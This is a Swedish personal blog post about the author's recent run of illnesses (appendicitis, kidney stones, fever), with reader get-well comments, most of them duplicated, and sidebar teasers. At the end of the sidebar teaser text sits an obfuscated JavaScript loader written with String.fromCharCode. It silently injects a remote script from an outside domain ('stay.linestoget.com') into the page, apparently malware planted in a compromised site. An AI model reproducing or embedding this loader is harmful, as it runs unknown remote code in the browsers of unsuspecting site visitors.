Hej från sjukstuga!

image

Hej & välkommen till sjukbloggen! Här inne kommer ni få följa mitt liv med sjukhusvistelser, feber, operationer, ambulansförd, förstoppning och andra mindre charmiga livssituationer!  För att inte tala om mitt sviktande immunförsvar! SUCK! 🤕🤒😡

Skämtosido, men jag är så trött på mig själv att jag inte finner ord!  Förlåt… Men seriöst! Allt på samma gång!? 

Vi tar det från början, Hej från soffan! 🙂

Idag är en sån dag… Jag är helt slut!  Magen bråkar fortfarande lite, men fungerar. Jag äter medicin i 4dagar till sen ska det nog vara bra igen. Nu tyckte jag att jag ”haft mitt” på ett tag vad det gäller sviktande hälsa… Men icke! Feber och DUNDER förkyld! Som ett skämt!

Nu är det ju inte något livshotande, och efter cancergalan så känns allt väldigt oviktigt i jämförelse.

Men man blir ju lite orolig när man varit så sjuk på kort tid. Jag har varit sjuk från den 23:e! Blindtarm, njursten, infektion, feber och förkyld på det!? VART är mitt immunförsvar? Jag brukar ju inte vara sjuk..

 I två dagar har hag varit på benen från morgon till kväll. Lite möten, pappersjobb och inspelning igår. Igår vid lunch när Åza var här så fick jag feber igen!?

Nu lyssnar jag banne mig på kroppen och ligger still och vilar…  Dubbla alvedon. Vatten, ingefära, citron och honung! 

image

Min utsikt just nu. Min tv, sex & The City (favvo serien jag aldrig kommer tröttna på) och ett bord fullt av Ludvigs lego-projekt som jag LOVAT att inte städa bort tills han är hemma igen…. Min lilla sötnöt ringde och sa det. För att han var orolig att jag skulle blanda ihop hans delar 🙂

Fasen vad man saknar ungen när han inte är här!!!!!

image image

OLYMPUS DIGITAL CAMERA
På min mage ligger Stina och spinner. Vid fötterna ligger Sture och sover <3 kram på dig! /My Martens

69 Komentarer

 1. Kanske kan en ändrad kost vara något? För att försöka påverka kroppen till mer friskhet? Lyssnat in Jonas Colting något? Coltings nakna sanning – heter hans podd. Han hade en serie om kost nu i höst (hur en äter sig frisk hette den -ish..). Spola deras försnack (som brukar vara typ 45 min (!)) och lyssna sedan. Gav massor enligt mig.
  Krya, krya!

 2. Hej! Ja du behövde verkligen inte mer nu din stackare. Tror dock inte det är nåt större fel på ditt immunförsvar med tanke på ditt levnadssätt. Du kan väl knappt göra mer rätt?
  Att du fick njursten o blindtarmen va ju bara ” otur” o har inte direkt nåt samband med immunförsvar att göra precis. Nu går det aggressiva virus som to.m har angripit mig som aldrig är sjuk, mycket sällan iaf. Feber hosta o förkylning det är flunsan det. Så oroa dig inte över detta My.
  Du kommer snart tbax på banan igen☺krya på oss!

 3. Kanske kan en ändrad kost vara något? För att försöka påverka kroppen till mer friskhet? Lyssnat in Jonas Colting något? Coltings nakna sanning – heter hans podd. Han hade en serie om kost nu i höst (hur en äter sig frisk hette den -ish..). Spola deras försnack (som brukar vara typ 45 min (!)) och lyssna sedan. Gav massor enligt mig.

  Krya, krya!

 4. Hej! Ja du behövde verkligen inte mer nu din stackare. Tror dock inte det är nåt större fel på ditt immunförsvar med tanke på ditt levnadssätt. Du kan väl knappt göra mer rätt😉

  Att du fick njursten o blindtarmen va ju bara ” otur” o har inte direkt nåt samband med immunförsvar att göra precis. Nu går det aggressiva virus som to.m har angripit mig som aldrig är sjuk, mycket sällan iaf. Feber hosta o förkylning det är flunsan det. Så oroa dig inte över detta My.

  Du kommer snart tbax på banan igen☺krya på oss!

 5. Har precis haft värsta förkylningen dock utan feber och hosta. Nu känner jag mig frisk men näsan jaa den ger visst aldrig upp.
  Tror att du nog bara haft en riktigt stor otur. Du ska kanske försöka undvika stora folkmassor ett tag framöver så att din kropp får återhämta sig utan några ”onödiga” infektioner. Man ska ju för den skull inte isolera sig men jag tror att du förstår hur jag menar.
  Kram o krya på dig ❤️

 6. Har precis haft värsta förkylningen dock utan feber och hosta. Nu känner jag mig frisk men näsan jaa den ger visst aldrig upp.
  Tror att du nog bara haft en riktigt stor otur. Du ska kanske försöka undvika stora folkmassor ett tag framöver så att din kropp får återhämta sig utan några ”onödiga” infektioner. Man ska ju för den skull inte isolera sig men jag tror att du förstår hur jag menar.
  Kram o krya på dig ❤️

 7. Krya på dej. Vore kul om du tipsade om inredning från den affären du brukar skriva om. Den kanske heter inredningen har så mycket o göra nu kommer inte ihåg. Nu smör ägnar det så nu blir det isgata imorgon onej. Söta är dina kissar o sonen. Kram.

 8. Krya på dej. Vore kul om du tipsade om inredning från den affären du brukar skriva om. Den kanske heter inredningen har så mycket o göra nu kommer inte ihåg. Nu smör ägnar det så nu blir det isgata imorgon onej. Söta är dina kissar o sonen. Kram.

 9. Ditt immunförsvar är sänkt efter operationen, då är du mer mottaglig för virus! Det hinner knappt bygga upp nått förrän du får ngt nytt. Det blir som en ond cirkel. Vet hur det är. Men det är inget du behöver vara orolig över. Vila, vila, vila även om det är svårt! Stackare, tycker synd om dig! Men snart är du tillbaka ska du se ? Det går ju så himla mycket virus nu med ?

 10. Ditt immunförsvar är sänkt efter operationen, då är du mer mottaglig för virus! Det hinner knappt bygga upp nått förrän du får ngt nytt. Det blir som en ond cirkel. Vet hur det är. Men det är inget du behöver vara orolig över. Vila, vila, vila även om det är svårt! Stackare, tycker synd om dig! Men snart är du tillbaka ska du se 🙂 Det går ju så himla mycket virus nu med 🙁

 11. Hejasan My.
  Följt dig ett tag nu, hoppas verkligen du kryar på dig nu efter allt ”skit” nu ?
  Va du inte på cancer-galen i män eller jag såg fel kanske?? Min syster var med ? Jessica Skarpsvärd, tyvärr tufft nu…
  Ville iaf bara ge dig en kram ❤❤

  • ❤️❤️❤️❤️❤️❤️❤️ Jo, jag var där. Årets viktigaste kväll. Så starkt. Din syster? ??❤️ All kärlek och omtanke❤️

 12. Hejasan My.
  Följt dig ett tag nu, hoppas verkligen du kryar på dig nu efter allt ”skit” nu 💩
  Va du inte på cancer-galen i män eller jag såg fel kanske?? Min syster var med 😢 Jessica Skarpsvärd, tyvärr tufft nu…
  Ville iaf bara ge dig en kram ❤❤

  • ❤️❤️❤️❤️❤️❤️❤️ Jo, jag var där. Årets viktigaste kväll. Så starkt. Din syster? 🙏🏻❤️ All kärlek och omtanke❤️

 13. Krya på dig! Det är nog influensan, många är sjuka nu el har varit det under december. Har själv varit sjuk under hela jul o nyår, feber, hosta och dunderförkyld, kräktes även en natt i samma veva hua, kryade till för några dagar sen. Jag har dåligt immunförsvar och blir lätt och ofta sjuk men just nu går det ju runt och inte många klarar sig undan. Du har ju varit ute bland en massa folk och då är det lätt att bli smittad. Krya krya!

 14. Krya på dig! Det är nog influensan, många är sjuka nu el har varit det under december. Har själv varit sjuk under hela jul o nyår, feber, hosta och dunderförkyld, kräktes även en natt i samma veva hua, kryade till för några dagar sen. Jag har dåligt immunförsvar och blir lätt och ofta sjuk men just nu går det ju runt och inte många klarar sig undan. Du har ju varit ute bland en massa folk och då är det lätt att bli smittad. Krya krya!

 15. Hej, min egna erfarenhet är att immunförsvaret blir dåligt när man stressar mkt. Även om man själv inte alltid känner sig stressade så kan det finnas inre stress. Eller så har man en stressig vardag. I mina ögon har du det -;) Du flänger hit och dit och jobbar mkt. Massor med roliga saker som du vill hinna med. Jag har varit precis lika dan och kört på. Tänkt att jag är en stark person som klarar det men efter första barnets födelse fick jag ont i kroppen och det sänkte mig totalt. Har under senaste 7 åren kämpat med dåligt immunförsvar, lätt utbrändhet (enligt läkaren har jag varit vidbränd :-)) Min kropp har sagt ifrån och visat att det är dags att dra ner på tempot! Jag måste än idag hushålla med min energi.. Dvs ta det lugnt emellanåt och har jag tränat tufft måste jag låta kroppen vila och återhämta sig efter. Inte träna varje dag även om jag vill! Precis som du får jag feberkänsla och ibland feber. Ont i halsen bihålorna när det blivit för mkt. Då är det paus som gäller! Brukar inte bli något av det om jag bara ser till att ta det lugnt. Samma med vikten för min del, går lätt upp! Ämnesomsättningen sänks kraftigt vid för mkt stress. Så ha det i åtanke ? Jag kan äta hur bra som helst men ändå gå upp! Har precis som du varit inne akut för magsmärtor. Inte blindtarm men ev njursten/gallsten – de hittade dock inga rester av stenar så det kan ha varit akut magkatarr – dvs stressrelaterad. Jag hade så galet ont och hade inte sambon kört in mig omgående så hade jag fått åka ambulans! Värre smärta än vid förlossning. Summerat kan jag nu i efterhand se att alla mina kroppsliga/psykiska/fysiska problem hänger ihop och faktisk beror på stress! Jag är ju ingen läkare men kan helt klart se ett samband med dina och mina problem och tror att även dina är stressrelaterade. Dock inte blindtarmen såklart.. Den vila du nu är tvingad till tror jag är bra. Nu när du varit dålig verkar du och lilleman tagit mer lugnt än någonsin och det tror jag är så bra!! Kvalitetstid bara för er! Inte flängande hit och dit på såklart massor med roliga saker utan mer vardagsliv så som de flesta familjer har det! Lite tråkigt enligt en del men lugnt och tryggt! Går de i förskola/ skola är det fullt upp som det är! Jag vet för jag jobbar på förskola och hjälp vilket tempo det ofta är! Ta nu god tid på dig och tänkt till på hur du vill att din framtid ska se ut och vad du verkligen mår bra av och vad som gör dig mest lycklig! Det har jag funderat mkt på och ett lugnt vardagsliv med mkt tid till barnen är mitt fokus. Men såklart tid för lite roliga saker där emellan, träning osv. det här blev ett långt inlägg ? krya på dig och lycka till med allt ❤️

 16. Hej, min egna erfarenhet är att immunförsvaret blir dåligt när man stressar mkt. Även om man själv inte alltid känner sig stressade så kan det finnas inre stress. Eller så har man en stressig vardag. I mina ögon har du det -;) Du flänger hit och dit och jobbar mkt. Massor med roliga saker som du vill hinna med. Jag har varit precis lika dan och kört på. Tänkt att jag är en stark person som klarar det men efter första barnets födelse fick jag ont i kroppen och det sänkte mig totalt. Har under senaste 7 åren kämpat med dåligt immunförsvar, lätt utbrändhet (enligt läkaren har jag varit vidbränd :-)) Min kropp har sagt ifrån och visat att det är dags att dra ner på tempot! Jag måste än idag hushålla med min energi.. Dvs ta det lugnt emellanåt och har jag tränat tufft måste jag låta kroppen vila och återhämta sig efter. Inte träna varje dag även om jag vill! Precis som du får jag feberkänsla och ibland feber. Ont i halsen bihålorna när det blivit för mkt. Då är det paus som gäller! Brukar inte bli något av det om jag bara ser till att ta det lugnt. Samma med vikten för min del, går lätt upp! Ämnesomsättningen sänks kraftigt vid för mkt stress. Så ha det i åtanke 😉 Jag kan äta hur bra som helst men ändå gå upp! Har precis som du varit inne akut för magsmärtor. Inte blindtarm men ev njursten/gallsten – de hittade dock inga rester av stenar så det kan ha varit akut magkatarr – dvs stressrelaterad. Jag hade så galet ont och hade inte sambon kört in mig omgående så hade jag fått åka ambulans! Värre smärta än vid förlossning. Summerat kan jag nu i efterhand se att alla mina kroppsliga/psykiska/fysiska problem hänger ihop och faktisk beror på stress! Jag är ju ingen läkare men kan helt klart se ett samband med dina och mina problem och tror att även dina är stressrelaterade. Dock inte blindtarmen såklart.. Den vila du nu är tvingad till tror jag är bra. Nu när du varit dålig verkar du och lilleman tagit mer lugnt än någonsin och det tror jag är så bra!! Kvalitetstid bara för er! Inte flängande hit och dit på såklart massor med roliga saker utan mer vardagsliv så som de flesta familjer har det! Lite tråkigt enligt en del men lugnt och tryggt! Går de i förskola/ skola är det fullt upp som det är! Jag vet för jag jobbar på förskola och hjälp vilket tempo det ofta är! Ta nu god tid på dig och tänkt till på hur du vill att din framtid ska se ut och vad du verkligen mår bra av och vad som gör dig mest lycklig! Det har jag funderat mkt på och ett lugnt vardagsliv med mkt tid till barnen är mitt fokus. Men såklart tid för lite roliga saker där emellan, träning osv. det här blev ett långt inlägg 🙂 krya på dig och lycka till med allt ❤️

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/